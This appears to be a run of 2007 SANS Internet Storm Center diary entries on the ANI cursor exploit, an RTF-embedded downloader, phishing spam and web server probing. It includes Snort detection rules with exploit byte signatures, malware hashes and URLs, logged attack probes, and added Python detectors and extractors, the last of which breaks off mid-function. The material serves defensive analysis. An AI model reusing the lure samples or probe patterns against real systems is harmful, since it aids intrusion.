Published: 2007-03-31

ANI: It Gets Better

McAfee is now reporting a spam campaign that includes an ANI exploit attempt:

"March 31, 2007. The .ANI File Format vulnerability has seen an increase in exploit attempts in-the-wild. McAfee Avert Labs has detected many Web sites linking to other sites that attempt to exploit this vulnerability. We have also observed a spam run that tries to lure its recipients to Web sites hosting code exploiting this vulnerability. Technical details and exploit code can now be easily obtained from these malicious Web sites. Following links in unsolicited e-mails and visiting unknown Web sites are strongly discouraged."

This affects e-mail clients that render HTML on vulnerable operating systems.  Exploitation can occur when the malicious message is opened, previewed, or forwarded.


Opening a folder in Explorer (not Internet Explorer) that contains a malicious .ANI file is enough to exploit the system; the file extension does matter in this case.  At least automated processes won't trigger execution (unlike WMF). (US-CERT Advisory)


Published: 2007-03-31

Chinese Internet Security Response Team Reports ANI Worm

The Chinese Internet Security Response Team reports the detection of a worm-like payload installed via the ANI exploit.  According to their report:

"It has the same behavior as Worm.Win32.Fujacks. It also can infect .HTML .ASPX .HTM .PHP .JSP .ASP and .EXE files, and inserts malicious links which contain the Windows Animated Cursor Handling zero-day vulnerability into .HTML .ASPX .HTM .PHP .JSP .ASP files. It also can send out Chinese spam which includes the same zero-day vulnerability link."

They recommend that the following domains be blocked to contain this particular variant:


Published: 2007-03-31

April 1: DST phase 2 and April Fools' Day

Remember all of those devices you manually set the clock on a few weeks ago?  You know, your Windows 2000 servers, etc.?
Hopefully you do, since tomorrow, all of your unpatched systems will "spring forward" per their original programming.

Tomorrow is also April Fools' Day, often observed with practical jokes and hoaxes.  In the past, the handlers have observed this "holiday" with humorous posts.  I've been informed that we will not be participating this year because of the heightened INFOCon.  Not everyone is going to follow that suggestion, so be aware of what you read tomorrow.


Published: 2007-03-31

*ANI exploit code drives INFOCon to Yellow

The ANI vulnerability has been of recent concern.  I've been waiting for a few key events to be confirmed before adjusting the INFOCon.  We don't take these decisions lightly.

Rating systems such as Symantec's ThreatCon (currently at 2 of 4), FS/ISAC's Cyber Threat Advisory (currently at Guarded) and our INFOCon (now at Yellow) all have their particular niche.  Symantec focuses on its AV and managed-security-service customers.  FS/ISAC focuses on financial institutions.  The Internet Storm Center's INFOCon is intended "to reflect changes in malicious traffic and the possibility of disrupted connectivity."

In the initial stages of this event, we did not satisfy the criteria to raise the INFOCon level.  Now, we have a different landscape.

  • Exploit code has been publicly released that allows trivial modification to add any arbitrary payload.
  • The number of malicious sites reported is rising rapidly, limiting the efficacy of blocklisting.
  • The number of compromised sites pointing to malicious sites is also on the rise.

What you can do in the meantime:

  • Keep anti-virus up to date.  So far this is the most effective layer, particularly generic signatures that detect non-compliant ANI files.  The secondary payloads downloaded by these exploits are also often (though not always) detectable.
  • Content filtering.  If your environment supports it, dropping ANI files (based on actual file inspection, not on the file extension) may be prudent until patches are deployed.  This will impact your myspace.com browsing experience, though.
We intend to maintain INFOCon Yellow status and reassess every 24 hours. (~1400 UTC)


Published: 2007-03-30

Detecting and filtering out windows animated cursor exploitation attempts

I recommend a defense in depth approach: do not rely on just one level of detection or filtering; use as many as feasible.

Many commercial antivirus products detect some or all of these exploits.
Make sure your antivirus engine and signatures are up to date.
That will greatly increase your chances of blocking an exploit.

IDS rules:

Bleeding Edge Snort rule (sid 2003519) for the currently observed JPEG-renamed ANIs (the traffic is server-to-client, so the flow keyword must be from_server to match the header direction):

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; flow:established,from_server; content:"|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|"; classtype:attempted-admin; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; sid:2003519; rev:1;)

From Sourcefire, this rule is in all VRT certified rulesets, including the free ruleset, and has been out since January 2005 (it was written for the earlier ANI bug, CVE-2004-1049, but its check on the anih chunk length still applies):

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Microsoft ANI file parsing overflow"; flow:established,from_server; content:"RIFF"; nocase; content:"anih"; nocase; byte_test:4,>,36,0,relative,little; reference:cve,2004-1049; classtype:attempted-user; sid:3079; rev:3;)
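The content-inspection filter suggested in the INFOCon entry and the Sourcefire rule's byte_test on the anih length come down to the same structural check. Here is an added Python example (mine, not from the diary or from any vendor) that parses a RIFF/ACON container and flags an anih chunk whose declared length is not the 36 bytes of a legitimate ANIHEADER, regardless of what the file is called. The build_ani helper constructs minimal test containers; they are simplified test data, not real cursors and not exploit code.

```python
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): the only legitimate payload length for an anih chunk


def iter_chunks(data, offset, end):
    """Yield (fourcc, payload_offset, declared_size) for each RIFF chunk in data[offset:end].

    Descends into LIST containers (ANI files keep their frames in LIST/fram).
    An oversized declared length simply ends the walk; the caller decides what it means.
    """
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        size = struct.unpack_from("<I", data, offset + 4)[0]
        payload = offset + 8
        yield fourcc, payload, size
        if fourcc == b"LIST" and payload + 4 <= end:
            # LIST payload = 4-byte list type followed by nested chunks
            yield from iter_chunks(data, payload + 4, min(payload + size, end))
        offset = payload + size + (size & 1)  # chunks are padded to even length


def inspect_ani(data):
    """Return a list of findings; an empty list means the blob looks like a compliant ANI."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON container"]
    findings = []
    anih_count = 0
    for fourcc, payload, size in iter_chunks(data, 12, len(data)):
        if payload + size > len(data):
            findings.append("chunk %r declares %d bytes but the file ends first" % (fourcc, size))
        if fourcc == b"anih":
            anih_count += 1
            if size != ANIH_SIZE:
                findings.append("anih chunk #%d has length %d, expected %d"
                                % (anih_count, size, ANIH_SIZE))
    if anih_count == 0:
        findings.append("no anih header chunk")
    return findings


def classify_blob(data):
    """Content-based verdict; the file name (.ani, .jpg, whatever) is deliberately ignored."""
    if len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"ACON":
        return "ani-suspect" if inspect_ani(data) else "ani-compliant"
    return "not-ani"


def build_ani(anih_sizes):
    """Constructed test data: an ACON container with anih chunks of the given declared
    sizes followed by one LIST/fram holding an empty icon chunk. Not a real cursor."""
    body = b"ACON"
    for n, size in enumerate(anih_sizes):
        body += b"anih" + struct.pack("<I", size) + bytes([0x41 + n]) * size
        body += b"\x00" * (size & 1)
    fram = b"fram" + b"icon" + struct.pack("<I", 4) + b"\x00" * 4
    body += b"LIST" + struct.pack("<I", len(fram)) + fram
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    good = build_ani([36])
    bad = build_ani([36, 1024])  # second anih header oversized, the pattern the Snort rules look for
    print(classify_blob(good), inspect_ani(good))
    print(classify_blob(bad), inspect_ani(bad))
    print(classify_blob(b"\xff\xd8\xff\xe0" + b"\x00" * 16))  # a real JPEG header, whatever its name
```

Run it over a proxy cache or an attachment queue and act on "ani-suspect"; a JPEG that is really an ACON container is reported as ANI, and an ANI-named JPEG is left alone, which is the file-inspection behaviour the INFOCon entry asks for.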

Several other commercial filtering products detect these exploit attempts.
Once again, updated signatures and engines will increase your chances of detecting them.

Based on the similarities I have seen between exploits, there is probably a tool that creates the ANI exploits, so domain blocking or blocking based on MD5s has value but may be difficult to manage and maintain.
I would still recommend blocking the domains or MD5s being used on a router, firewall, DNS, wherever you can block them.
Some of these sites may be victims themselves but some of these have been serving up malware for a LONG time.
The bc0.cn site was used in the Dolphin's Superbowl infection http://isc.sans.org/diary.html?storyid=2151.
Even if you do not block them you may wish to review your proxy logs for these.

Domains/IPs currently being used in exploitation:

MD5s for malware related to ANI exploitation:

Finally A big THANK YOU to all the people who submitted sites or binaries.


Published: 2007-03-30

Ani cursor exploits against Microsoft E-mail clients - CVE-2007-1765

A short overview of how the different email clients (in the supported list of Microsoft) are reacting to the animated cursor vulnerability (CVE-2007-1765) depending on the actions and settings of the email client.

The surprising element is that reading in plain text mode makes some of the clients more vulnerable (Outlook Express stops asking the user first) and, for this vulnerability, only offers real added value for Outlook 2003.

Client / action                        Default settings   Read in plain text mode   Reply/Forward with "Read in Plain Text" set
Windows XP Outlook Express, preview    Vulnerable(*)      Vulnerable                Vulnerable
Windows XP Outlook Express, open       Vulnerable(*)      Vulnerable                Vulnerable
Vista Mail, preview                    Vulnerable         -                         Vulnerable
Vista Mail, open                       Vulnerable         -                         Vulnerable
Outlook 2003, preview                  Vulnerable         -                         -
Outlook 2003, open                     Vulnerable         -                         -
Outlook 2007, preview                  -                  -                         -
Outlook 2007, open                     -                  -                         -

(-) not found vulnerable in this test

(*) It does interact with the user before being vulnerable, but we all know what typical users would do.

Swa Frantzen -- NET2S


Published: 2007-03-29


We've received a number of reports of spam appearing to come from "admin@microsoft.com" containing a link to a file called IE7.0.exe.

This is what VirusTotal has to say about it:

Antivirus Version Update Result
AhnLab-V3 2007.3.30.0 20070329 -
AntiVir 20070329 TR/Proxy.Agent.CL
Authentium 4.93.8 20070329 -
Avast 4.7.936.0 20070329 -
AVG 20070329 -
BitDefender 7.2 20070329 -
CAT-QuickHeal 9.00 20070329 (Suspicious) - DNAScan
ClamAV devel-20070312 20070329 -
DrWeb 4.33 20070329 -
eSafe 20070329 -
eTrust-Vet 30.6.3522 20070329 -
Ewido 4.0 20070329 -
F-Prot 20070328 -
F-Secure 6.70.13030.0 20070329 Virus.Win32.Grum.a
FileAdvisor 1 20070330 -
Fortinet 20070329 suspicious
Ikarus T3.1.1.3 20070329 -
Kaspersky 20070329 Virus.Win32.Grum.a
McAfee 4995 20070329 -
Microsoft 1.2306 20070329 -
NOD32v2 2154 20070329 -
Norman 5.80.02 20070329 -
Panda 20070329 Suspicious file
Prevx1 V2 20070330 Covert.Sys.Exec
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=c9a385855469
Sophos 4.16.0 20070329 -
Sunbelt 2.2.907.0 20070329 VIPRE.Suspicious
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
Symantec 10 20070330 Trojan Horse
TheHacker 20070323 -
UNA 1.83 20070316 -
VBA32 3.11.3 20070329 suspected of Trojan-PSW.Pinch.1 (paranoid heuristics)
VirusBuster 4.3.7:9 20070329 -
Webwasher-Gateway 6.0.1 20070329 Trojan.Proxy.Agent.CL

Name IE7.0.exe
Size 33280
md5 8e12a8281a6c6ebdbd75c26a93e69437
sha1 de94c34d51e8c04df174e27bc04eed134aca57d7
Date scanned 03/30/2007 00:22:04 (CET)

Norman Sandbox doesn't detect it and it seems to not want to run in certain virtual machines either.

Check your logs on proxy servers etc. for IE7.0.exe, it's being hosted in multiple places around the world.

Thanks to Dan, Brian, Sean, Richard and many other readers.

Swa Frantzen --- NET2S


Published: 2007-03-29

Windows Animated Cursor Handling vulnerability

Microsoft has released advisory 935423 regarding a vulnerability in Windows Animated Cursor Handling. A bug in the way Windows parses animated cursor files allows execution of arbitrary code with the privileges of the user who opened the malicious file.

Affected are Win2k SP4, XP SP2, Server 2003 and Vista. We have received reports of this vulnerability being exploited in the wild. While Animated cursors are usually downloaded as .ani files, blocking these files would not be sufficient to mitigate the vulnerability.

The vulnerability has been added to our missing Microsoft patches table.


Published: 2007-03-29

Cisco VoIP vulnerabilities.

Cisco announced software updates to address five Cisco bug IDs covering three separate denial-of-service (DoS) vulnerabilities that affect two of their VoIP products.
Cisco Security Advisory: Multiple Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) Denial of Service Vulnerabilities

Advisory ID: cisco-sa-20070328-voip

Vulnerable Products
* Cisco Unified CallManager 3.3 versions prior to 3.3(5)SR2a
* Cisco Unified CallManager 4.1 versions prior to 4.1(3)SR4
* Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR1
* Cisco Unified CallManager 5.0 versions prior to 5.0(4a)SU1
* Cisco Unified Presence Server 1.0 versions prior to 1.0(3)

There are no workarounds.

Filtering traffic as follows for affected CUCM / CUPS systems can be used as a mitigation technique:

Permit TCP port 2000 (SCCP) and TCP port 2443 (SCCPS) to CUCM systems only from VoIP endpoints.

ICMP Echo Requests (type 8) should be blocked for CUCM and CUPS systems. This may affect network management applications and troubleshooting procedures.

UDP Port 8500 (IPSec Manager) should only be permitted between CUCM / CUPS systems configured in a cluster deployment.


Published: 2007-03-28

Dangerous document formats and social engineering

If you’ve been reading our diaries for last couple of months, no doubt that you are aware of the huge number of exploits directed toward various Office applications, mainly Microsoft Word and PowerPoint. For quite some time a lot of administrators (us included) told people to convert documents to other (safer) formats, one of them being RTF (Rich Text Format). Although this format is proprietary, the specification is publicly available so a lot of word processors support this format.
Our reader Mike Armstrong reported a phishing e-mail he received from the Better Business Bureau. The e-mail contained a link to a site which hosted an RTF document. As this immediately looked suspicious (a completely unrelated web site hosted just the RTF document, nothing else), I decided to spend more time analyzing this. The file was located on http:// www. nightcrossings.com/[REMOVED].

Embedding everything

As you all know, complexity and security don't go well together. Nevertheless, lately we can see a trend of embedding everything in anything, which increases complexity as well. Microsoft Word documents that carry images and videos are completely normal now.
While RTF is a more human-readable format (it is, after all, a plain ASCII file), this does not prevent it from embedding objects that can be very dangerous, as we will see.
So, the picture below shows how Microsoft Word will open the file Mike submitted:


As you can see, this will work in any version of Microsoft Office (I used the latest and greatest Office 2007). The text and the icon shown in the screenshot are all part of a single object embedded in this document. This is a fine example of a social engineering attack: the attacker tries to make the victim believe that an error occurred in Microsoft Word and that the file (the object) should be double-clicked to fix it.
Luckily, Microsoft added at least another layer of protection here (although, to be honest, why anyone would allow a text-based format to drop a file and execute it is beyond me). If our trigger-happy user double-clicked on the object, he would be greeted with the following alert:


I will not go into the discussion if this would prevent him from starting the file or not, but at this point in time, his last (and only) defense is the Anti-virus program (more about that below).

Malware analysis

It is relatively easy to extract embedded objects from an RTF file. Windows ships with an application called Object Packager, which Word uses for embedded file objects. It can be accessed for every embedded object: all you have to do is right-click on the object and start it. You can see below what it reports for this document:


Object Packager was actually used by the attacker as well: first the file was attached and then the appearance was modified. The same way it was attached, it also allows us to save it so we can analyze what's inside.
If you know of an external utility that can analyze RTF files please let us know; ideally it would be a Perl script (some Perl modules exist for parsing RTF files but I haven't found a nice utility that allows extraction of embedded objects such as this one in one step).
The dropped file is (you can probably guess) a downloader. Once executed it downloads http:// www. nightcrossings.com /[REMOVED]/inv.exe, which looks like a spamming tool (it's a big 1.5MB executable written in Delphi that I haven't thoroughly analyzed).
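Here is an added example that does the extraction step in one go, written in Python rather than the Perl asked for above; it is not part of the diary and was not the tool used there. It locates each \objdata destination, hex-decodes it, and parses the OLE 1.0 ObjectHeader and EmbeddedObject layout documented in [MS-OLEDS] to recover the class name and the NativeData. The build_sample_rtf helper fabricates a test document; the "Package" wrapper it places in front of the payload is a stand-in and not the exact Object Packager layout, which is why carve_pe simply looks for the MZ header instead of parsing that wrapper.

```python
import binascii
import re
import struct

# Hex run that follows the \objdata control word; stops at the closing brace of the group.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def read_lp_ansi(buf, off):
    """MS-OLEDS LengthPrefixedAnsiString: u32 length (counting the NUL) then the bytes."""
    (length,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + length].rstrip(b"\x00"), off + length


def parse_ole1(buf):
    """Parse the OLE 1.0 stream stored in an RTF \\objdata destination:
    ObjectHeader (OLEVersion, FormatID, ClassName, TopicName, ItemName) and, for
    FormatID 2 (EmbeddedObject), NativeDataSize followed by NativeData."""
    ole_version, format_id = struct.unpack_from("<II", buf, 0)
    off = 8
    class_name, off = read_lp_ansi(buf, off)
    topic_name, off = read_lp_ansi(buf, off)
    item_name, off = read_lp_ansi(buf, off)
    native = b""
    if format_id == 2:
        (native_size,) = struct.unpack_from("<I", buf, off)
        native = buf[off + 4:off + 4 + native_size]
    return {"ole_version": ole_version, "format_id": format_id,
            "class_name": class_name, "topic_name": topic_name,
            "item_name": item_name, "native": native}


def extract_objects(rtf):
    """Find every \\objdata destination in the RTF bytes and parse its OLE 1.0 stream."""
    objects = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2 or len(hexdata) < 16:
            continue  # not a plausible object stream
        objects.append(parse_ole1(binascii.unhexlify(hexdata)))
    return objects


def carve_pe(native):
    """Heuristic for Package objects: return the data from the first 'MZ' onward so the
    dropped executable can be hashed or scanned on its own."""
    idx = native.find(b"MZ")
    return native[idx:] if idx >= 0 else b""


def build_sample_rtf(payload):
    """Constructed sample, not the document from the diary: one RTF carrying an embedded
    OLE 1.0 'Package' object. The bytes before the payload imitate a label and a path but
    are a stand-in, not the real Object Packager wrapper."""
    def lp(s):
        return struct.pack("<I", len(s) + 1) + s + b"\x00" if s else struct.pack("<I", 0)
    native = b"\x02\x00" + b"invoice.exe\x00" + b"C:\\invoice.exe\x00" + payload
    stream = struct.pack("<II", 0x501, 2) + lp(b"Package") + lp(b"") + lp(b"")
    stream += struct.pack("<I", len(native)) + native
    hexdata = binascii.hexlify(stream)
    wrapped = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi\\deff0 Error opening document. Double-click to repair.\\par\n"
            b"{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata \n" + wrapped + b"}}\\par}")


if __name__ == "__main__":
    sample = build_sample_rtf(b"MZ" + b"\x90" * 40 + b"fake PE body")
    for obj in extract_objects(sample):
        exe = carve_pe(obj["native"])
        print(obj["class_name"], obj["format_id"], len(obj["native"]), exe[:2])
```

Point extract_objects at the bytes of a suspicious RTF and write out carve_pe() of each "Package" object for scanning; objects of other classes (Word, Excel, Equation) come back with their class name and raw NativeData for whatever parser fits.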

AV protection and file parsing difficulties

Distributing innocent-looking files with embedded malware sounds very attractive to attackers. Once I extracted the dropper and downloaded the second-stage binary, I ran all of them through VirusTotal to see what detection, if any, there was. The results were pretty bad and showed that a lot of anti-virus products either had problems parsing RTF or couldn't parse it at all, which caused them to miss the dropper (some AV programs would hopefully catch it once the user executed the file).
The images below show VT results from scanning the RTF document and the dropper that is embedded in it (after it has been extracted as a standalone file):

The dropper itself was detected as:

Finally, the second stage binary was undetected by almost all AV vendors – hopefully they’ll add detection for this soon:
This was another example of why complex file formats should be avoided. Even if you do scan all files on your e-mail gateway (or web filtering server), as you can see most AV programs would miss this as they would scan only the RTF document. One more time we see how important defense in depth is – in this case you would depend on user’s awareness and ultimately on his desktop AV product.


Published: 2007-03-28

Microsoft XP Change Analysis Diagnostic Tool

Earlier today I came across a new tool that might be useful to InfoSec professionals.  Though it is not a "security" tool, support people can use it to better understand the modifications that may have occurred on a particular system.  Once installed, the tool scans the computer for specific types of changes, including:

  • Software Programs which are listed in the Add/Remove Program control panel
  • Operating System Components including Hotfixes or updates from Microsoft Update
  • Browser Helper Objects and other COM components loaded in Internet Explorer
  • Drivers
  • ActiveX Controls   and
  • Other Auto-Start Extensibility Points
It creates a nice little XML file that you can use for a variety of purposes.

However, in my testing on my laptop, I have found that some software packages make changes in more places than I even knew about. For example, Symantec Antivirus Corporate Edition changes the path to certain driver files with every virus definition update.  These will be reported as:
Changed from "\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070326.020\navex15.sys" to "\??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20070327.019\navex15.sys"
Adobe Acrobat apparently also makes regular modifications to the startup folder for its Speed Launcher program.

Even with these items that may need to be ignored depending on the support issue at hand, the tool may be very useful for determining what end users may have done to their computer.  This eliminates the user's need to accurately articulate the changes to you, if they actually admit to changing something.  For more information on the tool, please see KB Article 924732 at support.microsoft.com.


Published: 2007-03-28

Jikto - The Javascript based bot

Billy Hoffman, a security researcher at SPI Dynamics, presented a new tool called Jikto at ShmooCon. The tool uses Cross Site Scripting (XSS) vulnerabilities to trick the victim's browser into running malicious code. The code is injected into the victim's browser, where it runs silently. It either seeks more XSS-vulnerable targets and reports back to the attacker, or it reports back to the bot controller and awaits further commands.

Since Javascript is OS independent, this tool will run well on browsers running on different OS platforms. With Cross Site Scripting flaws being one of the most common vulnerabilities reported these days, it is easy to understand the potential effects of a toolkit like this.

Although Billy did not release the tool to the public, the attack principles are well understood in the security research community. Most researchers believe this proof of concept will very likely turn into real attacks shortly.


If you want to learn more about web attack techniques such as this, SANS offers Sec 519 - Web Application Security Workshop.


Published: 2007-03-27

Metasploit Framework 3.0 Released

The Metasploit Project released Metasploit Framework 3.0 today. It is one of the best tools for performing penetration tests, for system administrators to verify patch installations, and for product vendors to perform regression testing.
Version 3.0 contains 177 exploits, 104 payloads, 17 encoders and 3 NOP modules. Additionally, 30 auxiliary modules are included that perform a wide range of tasks, including host discovery, protocol fuzzing and denial-of-service testing.

The new version is available from the Metasploit Framework site.

Kevin Hong.


Published: 2007-03-26

WPAD trouble

Hacker conferences are more often than not a source of work for security people. When Microsoft issued MS99-054 (fixing CVE-1999-0858) one would have assumed they had looked into the auto-configuration of MSIE's proxy settings deeply enough not to have to fix it again. Unfortunately no such luck.

WPAD names inserted into DNS or WINS by a malicious local user are enough to divert browsers to an unauthorized proxy. Apparently the issue is bad enough for Microsoft to release KB 934864 about it.

To summarize, to use WPAD yourself via DHCP:

  • dhcpd:
    add one of the following to your dhcpd.conf, either by raw option number:
option option-252 "http://example.com/path/to/proxyconfig.pac";
    or by declaring the option first:
option wpad code 252 = text;
option wpad "http://example.com/path/to/proxyconfig.pac";
See more in the recently expired IETF draft.

If you can't do that, create a DNS TXT record with the name WPAD in every domainname you run to avoid MSIE finding a host with that name and do the same in WINS. (see the above mentioned KB for how to do it in Microsoft's implementations)

We've added this vulnerability in our overview table.

Swa Frantzen -- NET2S


Published: 2007-03-26

SANS Software Security Institute

SANS (same 'SANS' as the one behind the 'SANS Internet Storm Center' ;-) ) today announced the "SANS Software Security Institute". The idea behind the "SANS-SSI" is to offer a number of different assessment tests. Programmers can take these tests to identify skill gaps. Tests will be offered for various languages. Right now, a short free sample test is offered for C/C++ and Java. See the SANS-SSI website (www.sans-ssi.org) for more details.


Published: 2007-03-26

The first day in the life of a website

It has been a rather long time since I had to set up a website from scratch so I was rather amazed when I started looking at the logs of a system which went live around 15:00 CET last Saturday.

The setup, a standard Apache running on OpenBSD 4.0, consists of an SSL password-protected virtual host, a single page redirecting from the non-SSL virtual host to the SSL version if you forget the 's' and a blank page waiting for connections on the direct IP address without the correct Host: directive.

The interesting logs are obviously the ones for the direct IP address accesses...

The preamble

83.180.231.X - - [24/Mar/2007:15:12:30 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv: Gecko/20070223 Camino/1.1b"
217.172.253.X - - [24/Mar/2007:15:43:33 +0100] "GET / HTTP/1.0" 200 274 "-" "-"
217.172.253.X - - [24/Mar/2007:16:30:06 +0100] "GET / HTTP/1.0" 200 274 "-" "-"
208.11.16.X - - [25/Mar/2007:01:05:00 +0100] "\x10\x01" 501 - "-" "-"
217.172.239.X - - [25/Mar/2007:12:39:37 +0200] "GET / HTTP/1.0" 200 274 "-" "-"
82.165.42.X - - [25/Mar/2007:15:11:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"

So, the first one, no prizes for guessing correctly, would be yours truly testing that the site works (hey, I actually have a valid User-Agent!).

Barely 20 minutes later someone visits a completely unannounced website with no www.domain CNAME assigned to it from Poland (hi there!), twice, from the same IP on some DSL provider in Lodz.  Then, someone from the USA visits, middle of the night for me, comfortable mid-morning coffee script-kidding for him, sitting on wythenet.com trying a nice hex escape to try and tickle the server for information. Then around midday our friend from Poland comes again (my dear chap you might benefit from a database to archive the info...) but from a different net and "closing the first day of life" we are visited by a well-hacked server in Germany.

Making good(?) use of the collected information

So, after the in-depth mapping of the server (which is, incidentally running nothing bar Apache, no modules, ServerTokens appropriately set, etc.) the first script kiddie "attacks":

208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /phpmyadmin/main.php HTTP/1.0" 404 295 "-" "-"
208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /db/main.php HTTP/1.0" 404 287 "-" "-"

So this is the gentleman coming in from the USA who has gathered the data from his "scan" and is now attacking the sites after breakfast (his breakfast of course, middle of the afternoon for Europe).  He is finished quite quickly:

208.11.16.X - - [25/Mar/2007:16:25:21 +0200] "GET /admin/phpMyAdmin-2.6.4-rc1/main.php HTTP/1.0" 404 311 "-" "-"

To make the Sunday more interesting we have someone trying to SSL brute force the server:

194.235.70.X - - [25/Mar/2007:17:17:25 +0200] "GET /sumthin HTTP/1.0" 404 283 "-" "-"

The line above is the signature of the ATD OpenSSL Mass Exploiter and if you bother looking for the IP address on Google you will see that the particular sort-of-obfuscated IP has been active for a while (and has now finally been reported to the guilty party).

What about day 2?

Monday morning is boringly quiet until after lunch when we have someone looking for FrontPage vulnerabilities:

85.25.140.X - - [26/Mar/2007:14:33:35 +0200] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 316 "-" "core-project/1.0"

I guess the logic might be "new host, middle of a large colo block, could well be FrontPage...", seems to be a one-off but comes from one of those large server4you farms in Germany so could well be the result of the European scanning on Saturday.

Obviously 24 hrs must be the standard "nobody checks their logs for that long" period because our last visitor from Sunday now returns and plays PHP games:

82.165.42.X - - [26/Mar/2007:15:30:14 +0200] "GET / HTTP/1.0" 200 274 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /index.php HTTP/1.0" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /wbb2/index.php HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /board/index.php HTTP/1.0" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

Welcome back!

Somewhat more thorough than our US scanner he is done faster since he is on a faster and very close (three hops...) link to my server:

82.165.42.X - - [26/Mar/2007:15:30:35 +0200] "POST /database/main.php HTTP/1.0" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

At which point the obvious observation is that these days you barely have the time to put a website up before it is visited, catalogued and exploited (fortunately with untargeted automated tools).

Reader quiz

Now, for extra points, who spotted the time change in the preamble where the timezone offset goes from GMT+1 (CET) to GMT+2 (CEST)?
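As an added example (not part of the diary), here is a Python pass over the log lines quoted above that tags each probe by the signature it left (the phpMyAdmin paths, the /sumthin OpenSSL scanner fingerprint, the FrontPage author.dll POST, the malformed request, root fetches with an empty User-Agent) and, for the quiz, reports the time zone offsets in order of first appearance. The sample log is assembled from the excerpts above; the rule list is my own and assumes those paths are never legitimate on this server.

```python
import re
from collections import defaultdict

# Sample assembled from the access log excerpts above (source addresses masked with X as in the diary).
SAMPLE_LOG = r"""
83.180.231.X - - [24/Mar/2007:15:12:30 +0100] "GET / HTTP/1.1" 200 291 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv: Gecko/20070223 Camino/1.1b"
217.172.253.X - - [24/Mar/2007:15:43:33 +0100] "GET / HTTP/1.0" 200 274 "-" "-"
208.11.16.X - - [25/Mar/2007:01:05:00 +0100] "\x10\x01" 501 - "-" "-"
82.165.42.X - - [25/Mar/2007:15:11:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"
208.11.16.X - - [25/Mar/2007:16:24:36 +0200] "GET /phpmyadmin/main.php HTTP/1.0" 404 295 "-" "-"
208.11.16.X - - [25/Mar/2007:16:25:21 +0200] "GET /admin/phpMyAdmin-2.6.4-rc1/main.php HTTP/1.0" 404 311 "-" "-"
194.235.70.X - - [25/Mar/2007:17:17:25 +0200] "GET /sumthin HTTP/1.0" 404 283 "-" "-"
85.25.140.X - - [26/Mar/2007:14:33:35 +0200] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 316 "-" "core-project/1.0"
82.165.42.X - - [26/Mar/2007:15:30:15 +0200] "POST /wbb2/index.php HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
82.165.42.X - - [26/Mar/2007:15:30:35 +0200] "POST /database/main.php HTTP/1.0" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
"""

# Apache combined log format; Apache writes non-printable request bytes as \xNN escapes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
VALID_REQUEST_RE = re.compile(r"^[A-Z]+ \S+ HTTP/\d\.\d$")

# Signatures of the untargeted tools seen above (my list; extend it from your own logs).
PROBE_RULES = [
    ("phpMyAdmin probe", re.compile(r"/(phpmyadmin|db|database|admin/phpMyAdmin)[^ ]*/main\.php", re.I)),
    ("OpenSSL mass-exploiter fingerprint", re.compile(r"^GET /sumthin ")),
    ("FrontPage author.dll probe", re.compile(r"/_vti_bin/_vti_aut/author\.dll")),
    ("PHP board POST probe", re.compile(r"^POST /(?:\w+/)?index\.php ")),
]


def label_request(req, ua):
    """Return every rule name that applies to one request line."""
    labels = [name for name, rx in PROBE_RULES if rx.search(req)]
    if not VALID_REQUEST_RE.match(req):
        labels.append("malformed request (server fingerprinting)")
    elif req.startswith("GET / HTTP/") and ua == "-":
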